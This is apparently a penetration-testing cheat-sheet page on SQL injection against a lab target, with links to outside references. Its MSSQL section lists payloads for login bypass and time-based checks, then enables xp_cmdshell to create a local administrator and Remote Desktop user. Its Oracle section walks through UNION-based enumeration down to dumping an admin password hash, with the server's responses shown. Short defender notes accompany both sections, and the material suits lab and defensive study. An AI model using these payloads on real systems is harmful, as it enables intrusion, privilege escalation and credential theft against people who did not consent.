# SQL Injection

### MSSQL and Oracle

{% embed url="https://www.exploit-db.com/papers/12975" %}

{% embed url="http://www.securityidiots.com/Web-Pentest/SQL-Injection/Union-based-Oracle-Injection.html" %}

{% embed url="https://portswigger.net/web-security/sql-injection/blind" %}

{% embed url="https://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet" %}

```
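MSSQL INJECTION EXAMPLE
## LOGIN-FORM (lab target; the psw value presumably reaches the query unparameterized)
## The first three requests confirm the injection: a boolean bypass, then time-based checks with WAITFOR DELAY.
## The sp_configure / xp_cmdshell / sp_addlogin requests only work if the web application's SQL Server login holds server-level admin rights (e.g. sysadmin); a least-privilege login stops the chain there.
## Defender view: parameterize the login query and keep xp_cmdshell disabled. Alert on WAITFOR DELAY or sp_configure in request logs, on xp_cmdshell configuration changes in the SQL Server error log, and on Windows Security events 4720 (account created) / 4732 (member added to a local group).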
http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test' or '1'='1
http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; IF (1=1) WAITFOR DELAY '0:0:10'--
http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; WAITFOR DELAY '0:0:10'--

http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; EXEC sp_configure 'show advanced options', 1;--
http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; RECONFIGURE;--
http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; EXEC sp_configure 'xp_cmdshell', 1;--
http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; RECONFIGURE;--

http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; EXEC xp_cmdshell 'net user gerh Pass123 /add';--
http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; EXEC xp_cmdshell 'net localgroup Administrators gerh /add';--
http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; EXEC xp_cmdshell 'net localgroup "Remote Desktop Users" gerh /add';--


http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; EXEC sp_addlogin 'user', 'pass';-- 
```

```
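SQL ORACLE EXAMPLE
== UNION-based; lines starting "Blog entry from" are the application's responses to the payload above them
== Defender view: use bind variables for the injected parameter. WEB_ADMINS is readable here because the account the blog page runs as can select from it; a separate least-privilege account for the public page would limit the exposure.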
' or '1'='1
' order by 3--
' order by 4-- == returns an error, so the original query selects 3 columns
' UNION SELECT 1, 1, 1--
' UNION SELECT 1, 1, 1 from dual--
' UNION SELECT null, null, null from dual--

' UNION SELECT 'XXX', 'ZZZ', null from dual--

' UNION SELECT 'XXX', sys.database_name, null from dual--
Blog entry from XXX with title XE from 0

' UNION SELECT 'XXX', (select banner from v$version where rownum=1), null from dual--
Blog entry from XXX with title Oracle Database 18c Express Edition Release 18.0.0.0.0 - Production from 0

' UNION SELECT 'XXX', table_name, null from all_tables--
Blog entry from XXX with title ALL_UNIFIED_AUDIT_ACTIONS from 0
Blog entry from XXX with title AUDIT_ACTIONS from 0
Blog entry from XXX with title AV_DUAL from 0
Blog entry from XXX with title AW$AWCREATE from 0

' UNION SELECT 'XXX', column_name, null from all_tab_columns where table_name='WEB_USERS'--
Blog entry from XXX with title PASSWORD from 0
Blog entry from XXX with title USER_ID from 0
Blog entry from XXX with title USER_NAME from 0

' UNION SELECT 'XXX', column_name, null from all_tab_columns where table_name='WEB_ADMINS'--
Blog entry from XXX with title ADMIN_ID from 0
Blog entry from XXX with title ADMIN_NAME from 0
Blog entry from XXX with title PASSWORD from 0


' UNION SELECT 'XXX', ADMIN_NAME||PASSWORD, null from WEB_ADMINS--
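Blog entry from XXX with title admind82494f05d6917ba02f7aaa29689ccb444bb73f20380876cb05d1f37537b7892 from 0
== the title is ADMIN_NAME immediately followed by PASSWORD (no separator): "admin" plus 64 hex characters, the length of a SHA-256 digest, so presumably a password hash rather than plaintext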
```

{% embed url="https://portswigger.net/support/using-sql-injection-to-bypass-authentication" %}
